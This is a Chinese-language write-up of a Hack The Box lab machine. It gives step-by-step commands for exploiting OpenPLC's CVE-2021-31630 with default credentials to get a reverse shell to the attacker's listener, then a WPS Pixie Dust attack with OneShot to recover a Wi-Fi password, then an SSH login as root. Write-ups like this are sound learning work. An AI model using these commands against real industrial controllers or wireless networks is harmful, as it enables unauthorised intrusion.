Before all
不知道為什麼我的OneShot後來要重打進去之後就掛ㄌ…反正絕對不是被我玩壞了
Attacker’s IP : 10.10.14.46
Victim’s IP : 10.10.11.7
Write up
RECON
port scan
command:
1 | rustscan -a 10.10.11.7 --ulimit 5000 -- -sC -sV -Pn |
result:
port 8080 開著 OepnPLC的服務:
Exploit
CVE-2021-31630
經過上網查詢得到預設密碼為 openplc:openplc
在exploit-db上發現這個漏洞,從github抓取腳本:
https://github.com/thewhiteh4t/cve-2021-31630/blob/main/cve_2021_31630.py
指令:
command:
1 | python3 OpenPLCRCE.py -u openplc -p openplc -lh 10.10.14.46 -lp 9902 http://10.10.11.7:8080 |
在自己的9902 port開啟了reverse shell,get shell!!!
比較特別的是連上去已經是root+在一個容器裡面而且linpeas告訴我可以打出去,簡單了解後我嘗試了CVE-2022-0492的攻擊一個多小時都沒能成功= =
去喵了網路上的wp才知道要打wifi…
wifi hacking
可以參考這篇
https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
然後我最後成功的oneshot版本,要先下載:
https://github.com/kimocoder/OneShot/blob/master/oneshot.py
wifi scanning:
1 | ip link show |
確認了bss是02:00:00:00:01:00, SSID是plcrouter,在對方機器上利用oneshot進行 WPS Pixie Dust attack:
1 | python3 oneshot.py -i wlan0 -b 02:00:00:00:01:00 -K |
得到密碼(PSK):NoWWEDoKnowWhaTisReal123!
接著把這些資訊存到config(在/root)裡面:
1 | wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config |
最後用wpa_supplicant開啟wifi連線,並手動調整ip(要跟router在同一個內網)
1 | wpa_supplicant -B -c config -i wlan0 |
再ssh上去就拿到flag啦~
1 | ssh root@192.168.1.1 |
After all
超愛HTB的效果w
打wifi好好玩,可惜我把他玩壞了 :D
第2048名超酷